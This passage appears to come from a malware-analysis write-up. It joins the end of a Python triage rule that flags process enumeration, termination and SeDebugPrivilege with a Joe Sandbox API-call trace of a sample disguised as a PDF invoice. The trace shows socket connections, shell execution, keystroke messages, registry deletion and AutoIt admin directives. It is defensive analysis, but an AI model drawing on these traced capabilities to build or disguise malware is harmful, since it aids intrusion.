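        if rec.has("OpenProcess", "TerminateProcess"):
            note = "opens and terminates processes"
            if rec.has("CreateToolhelp32Snapshot"):
                note += " after enumerating them"
            if "SeDebugPrivilege" in rec.strings:
                note += "; references SeDebugPrivilege, so other users' and SYSTEM processes are in reach"
            findings.append((i, note))
    return findings
```

Run `triage(parse_records(SAMPLE_LISTING))` to get one finding per record; feed it the text of a real listing and the same two rules fire on the records at 007A9B70 and 007CECB8. Unresolved arguments (shown as `?` in the report) are kept as None rather than guessed, so a rule only fires on constants the plugin actually recovered.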
                                                                                                                      APIs
                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 007B32C5
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoad
                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                      • Opcode ID: 3fe1dabb6102611391c2def979ba7ac87d08ea33654836b94cd05e46c663e674
                                                                                                                      • Instruction ID: 97383c87802c9d8635d571b14ffac5ff1852f8ce4c6f62ee58f7b9e5f883f898
                                                                                                                      • Opcode Fuzzy Hash: 3fe1dabb6102611391c2def979ba7ac87d08ea33654836b94cd05e46c663e674
                                                                                                                      • Instruction Fuzzy Hash: C411273224875AFAEB055A54DC42EEAB39CFF19370F20402AF515A62C1E66D5B8046A5
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007B454E
                                                                                                                      • LoadStringW.USER32(00000000), ref: 007B4555
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007B456B
                                                                                                                      • LoadStringW.USER32(00000000), ref: 007B4572
                                                                                                                      • _wprintf.LIBCMT ref: 007B4598
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007B45B6
                                                                                                                      Strings
                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 007B4593
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                      • API String ID: 3648134473-3128320259
APIs
  • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
• GetSystemMetrics.USER32(0000000F), ref: 007DD78A
• GetSystemMetrics.USER32(0000000F), ref: 007DD7AA
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007DD9E5
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007DDA03
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007DDA24
• ShowWindow.USER32(00000003,00000000), ref: 007DDA43
• InvalidateRect.USER32(?,00000000,00000001), ref: 007DDA68
• DefDlgProcW.USER32(?,00000005,?,?), ref: 007DDA8B
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-0
APIs
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0078C417,00000004,00000000,00000000,00000000), ref: 00752ACF
• ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0078C417,00000004,00000000,00000000,00000000,000000FF), ref: 00752B17
• ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0078C417,00000004,00000000,00000000,00000000), ref: 0078C46A
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0078C417,00000004,00000000,00000000,00000000), ref: 0078C4D6
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 007B737F
  • Part of subcall function 00770FF6: std::exception::exception.LIBCMT ref: 0077102C
  • Part of subcall function 00770FF6: __CxxThrowException@8.LIBCMT ref: 00771041
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007B73B6
• EnterCriticalSection.KERNEL32(?), ref: 007B73D2
• _memmove.LIBCMT ref: 007B7420
• _memmove.LIBCMT ref: 007B743D
• LeaveCriticalSection.KERNEL32(?), ref: 007B744C
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007B7461
• InterlockedExchange.KERNEL32(?,000001F6), ref: 007B7480
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 256516436-0
APIs
• DeleteObject.GDI32(00000000), ref: 007D645A
• GetDC.USER32(00000000), ref: 007D6462
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 007D646D
• ReleaseDC.USER32(00000000,00000000), ref: 007D6479
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007D64B5
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007D64C6
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007D9299,?,?,000000FF,00000000,?,000000FF,?), ref: 007D6500
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007D6520
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
APIs
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
APIs
  • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
  • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
  • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
• _wcstok.LIBCMT ref: 007BEEFF
• _wcscpy.LIBCMT ref: 007BEF8E
• _memset.LIBCMT ref: 007BEFC1
Strings
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
Similarity
• API ID:
• String ID:
• API String ID:
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• IsWindow.USER32(019059A0), ref: 007DB6A5
• IsWindowEnabled.USER32(019059A0), ref: 007DB6B1
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007DB795
• SendMessageW.USER32(019059A0,000000B0,?,?), ref: 007DB7CC
• IsDlgButtonChecked.USER32(?,?), ref: 007DB809
• GetWindowLongW.USER32(019059A0,000000EC), ref: 007DB82B
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007DB843
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
APIs
• _memset.LIBCMT ref: 007CF75C
• _memset.LIBCMT ref: 007CF825
• ShellExecuteExW.SHELL32(?), ref: 007CF86A
  • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
  • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
  • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
• GetProcessId.KERNEL32(00000000), ref: 007CF8E1
• CloseHandle.KERNEL32(00000000), ref: 007CF910
Strings
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
APIs
• GetParent.USER32(?), ref: 007B149C
• GetKeyboardState.USER32(?), ref: 007B14B1
• SetKeyboardState.USER32(?), ref: 007B1512
• PostMessageW.USER32(?,00000101,00000010,?), ref: 007B1540
• PostMessageW.USER32(?,00000101,00000011,?), ref: 007B155F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 007B15A5
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 007B15C8
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetParent.USER32(00000000), ref: 007B12B5
• GetKeyboardState.USER32(?), ref: 007B12CA
• SetKeyboardState.USER32(?), ref: 007B132B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007B1357
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007B1374
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007B13B8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007B13D9
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007ADAC5
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007ADAFB
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007ADB0C
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007ADB8E
Strings
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: ,,~$DllGetClassObject
• API String ID: 753597075-463960871
APIs
  • Part of subcall function 007B48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007B38D3,?), ref: 007B48C7
  • Part of subcall function 007B48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007B38D3,?), ref: 007B48E0
• lstrcmpiW.KERNEL32(?,?), ref: 007B38F3
• _wcscmp.LIBCMT ref: 007B390F
• MoveFileW.KERNEL32(?,?), ref: 007B3927
• _wcscat.LIBCMT ref: 007B396F
• SHFileOperationW.SHELL32(?), ref: 007B39DB
Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 1377345388-1173974218
                                                                                                                      • Opcode ID: 88a832c5c8efedfd193cf2e54747e4302f518242a0424cd9c6507a47f830579b
                                                                                                                      • Instruction ID: b51c955f2ca7fdc65c56485e9e639007f4312d8744aa05ad0c0dfd63b589a8c2
                                                                                                                      • Opcode Fuzzy Hash: 88a832c5c8efedfd193cf2e54747e4302f518242a0424cd9c6507a47f830579b
                                                                                                                      • Instruction Fuzzy Hash: 8541827240C3449ACB51EF64C485ADFB7E8AF88344F00492EF49AC3152EA7CE68DC752
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007D7519
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D75C0
                                                                                                                      • IsMenu.USER32(?), ref: 007D75D8
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007D7620
                                                                                                                      • DrawMenuBar.USER32 ref: 007D7633
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3866635326-4108050209
                                                                                                                      • Opcode ID: a2bd5080baa42566bd7ba328d0e4aadc716f1187c9df78cd984929c7546a6250
                                                                                                                      • Instruction ID: ca5a0917ecdf7620021c71a220de3ccb246a32b5dda7d51c41470d99e71405a8
                                                                                                                      • Opcode Fuzzy Hash: a2bd5080baa42566bd7ba328d0e4aadc716f1187c9df78cd984929c7546a6250
                                                                                                                      • Instruction Fuzzy Hash: E1411775A05609EFDB14DF54E884E9ABBB8FF04314F08812AE95697350E735ED50CF90
                                                                                                                      APIs
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007D125C
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D1286
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 007D133D
                                                                                                                        • Part of subcall function 007D122D: RegCloseKey.ADVAPI32(?), ref: 007D12A3
                                                                                                                        • Part of subcall function 007D122D: FreeLibrary.KERNEL32(?), ref: 007D12F5
                                                                                                                        • Part of subcall function 007D122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007D1318
                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 007D12E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 395352322-0
                                                                                                                      • Opcode ID: 724335ff7666e7808b63998b12cc5bf79a8f503c758d656e0bd69c265fabe591
                                                                                                                      • Instruction ID: 4e0a5b580da4b05b18a9d662243224a8730d4be62428b739d887aeadc9124b90
                                                                                                                      • Opcode Fuzzy Hash: 724335ff7666e7808b63998b12cc5bf79a8f503c758d656e0bd69c265fabe591
                                                                                                                      • Instruction Fuzzy Hash: 82312BB1901109BFDB149B90DC89EFEB7BCEF08300F40416AE512E2251EA79AE459BA4
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007D655B
                                                                                                                      • GetWindowLongW.USER32(019059A0,000000F0), ref: 007D658E
                                                                                                                      • GetWindowLongW.USER32(019059A0,000000F0), ref: 007D65C3
                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007D65F5
                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007D661F
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 007D6630
                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007D664A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2178440468-0
                                                                                                                      • Opcode ID: b99d46e805df2518f2aec61d19e76d373d2a2da36f35e9e61710c361a99f6297
                                                                                                                      • Instruction ID: caedf365965d6ef8cd78448c29b3946fd62065d467eac9ec6ee1873c1fa77958
                                                                                                                      • Opcode Fuzzy Hash: b99d46e805df2518f2aec61d19e76d373d2a2da36f35e9e61710c361a99f6297
                                                                                                                      • Instruction Fuzzy Hash: 7B310230605210AFDB20CF18EC84F553BF5FB4A310F1881AAF5568B3B6CB69E8A0DB51
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007C80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007C80CB
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007C64D9
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 007C64E8
                                                                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007C6521
                                                                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 007C652A
                                                                                                                      • WSAGetLastError.WSOCK32 ref: 007C6534
                                                                                                                      • closesocket.WSOCK32(00000000), ref: 007C655D
                                                                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007C6576
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 910771015-0
                                                                                                                      • Opcode ID: e639dfc8ecc55e133bf2ca4450890b443ad43003834908eea3c4e63d07634a85
                                                                                                                      • Instruction ID: 1e38b10d83f8ef84bb4ec43001d7a63ac75b43c21afc80cca6e28f6b9e8d7376
                                                                                                                      • Opcode Fuzzy Hash: e639dfc8ecc55e133bf2ca4450890b443ad43003834908eea3c4e63d07634a85
                                                                                                                      • Instruction Fuzzy Hash: 2D31A431600118EBDB109F24DC89FBE77B9EB44721F04802DFD06A7291DB78AD04CB62
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007AE0FA
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007AE120
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 007AE123
                                                                                                                      • SysAllocString.OLEAUT32 ref: 007AE144
                                                                                                                      • SysFreeString.OLEAUT32 ref: 007AE14D
                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 007AE167
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 007AE175
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761583154-0
                                                                                                                      • Opcode ID: d4784a8398aaae753f0b9be023a7cd4ac8272bf2b3f3013bd613e39fa0ab8ade
                                                                                                                      • Instruction ID: 492d5e8b05a9b60799595e561beead48ccc0f6baae7fb4b21a2b612753f8a352
                                                                                                                      • Opcode Fuzzy Hash: d4784a8398aaae753f0b9be023a7cd4ac8272bf2b3f3013bd613e39fa0ab8ade
                                                                                                                      • Instruction Fuzzy Hash: FA215335605118AFDB10AFA8DC88DAB77ECEB4A760B50C236F955CB260DA78DC41CF64
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                      • API String ID: 1038674560-2734436370
                                                                                                                      • Opcode ID: c750369eccc7adcec5d0f129311e1d459d24da501b68bc0d783ab9116b9519d1
                                                                                                                      • Instruction ID: e11f40d85954d8fa646d76c1048b93704782e0b90c95a94cb9db8e87f1f4bc34
                                                                                                                      • Opcode Fuzzy Hash: c750369eccc7adcec5d0f129311e1d459d24da501b68bc0d783ab9116b9519d1
                                                                                                                      • Instruction Fuzzy Hash: C4219A72200650A6D634A675DC16FA7739CDF96350F108235F88986182EB5C9D82D2B4
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
                                                                                                                        • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
                                                                                                                        • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007D78A1
                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007D78AE
                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007D78B9
                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007D78C8
                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007D78D4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                      • Opcode ID: fb59fa6dc369597c83dbf1479c07128739a5c871ea04d9b091977dcd036f6ce5
                                                                                                                      • Instruction ID: fd6bc40a31d845ede7355fc6835399d7afa5101ea3387e5f8ad3a58894250847
                                                                                                                      • Opcode Fuzzy Hash: fb59fa6dc369597c83dbf1479c07128739a5c871ea04d9b091977dcd036f6ce5
                                                                                                                      • Instruction Fuzzy Hash: 5211B2B2110219BFEF159F60CC85EE77F6DEF08798F018115FA04A2190DB769C21EBA4
                                                                                                                      APIs
                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00774292,?), ref: 007741E3
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 007741EA
                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 007741F6
                                                                                                                      • DecodePointer.KERNEL32(00000001,00774292,?), ref: 00774213
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                      • String ID: RoInitialize$combase.dll
                                                                                                                      • API String ID: 3489934621-340411864
                                                                                                                      • Opcode ID: 1e2352989cd764ac352148f7e687b2ac7524404b2bcdf2354fd31ebb75affd28
                                                                                                                      • Instruction ID: f2aff5a5587cf137f6f821de3767f326d4210f9ce0e7dfb2411e42ce0347d581
                                                                                                                      • Opcode Fuzzy Hash: 1e2352989cd764ac352148f7e687b2ac7524404b2bcdf2354fd31ebb75affd28
                                                                                                                      • Instruction Fuzzy Hash: 89E01AB0692344BEEF206BB1EC0DB543AA8BB24742F51D425F916D50A0DBBE40928F04
                                                                                                                      APIs
                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007741B8), ref: 007742B8
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 007742BF
                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 007742CA
                                                                                                                      • DecodePointer.KERNEL32(007741B8), ref: 007742E5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                      • String ID: RoUninitialize$combase.dll
                                                                                                                      • API String ID: 3489934621-2819208100
                                                                                                                      • Opcode ID: 4d84bc07b4c6f33343503519e624323da84c78b8a9af7b47a7650800c53a2d8b
                                                                                                                      • Instruction ID: 06ce0cebd6c8be52bcbd664678aa6ab291010f3b797652cdaa1f2de6edacdc2c
                                                                                                                      • Opcode Fuzzy Hash: 4d84bc07b4c6f33343503519e624323da84c78b8a9af7b47a7650800c53a2d8b
                                                                                                                      • Instruction Fuzzy Hash: 8AE0B6B8682305BBEB119B61ED0DF843BB8BB24782F15D026F112E10A5CBBD4561CA18
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
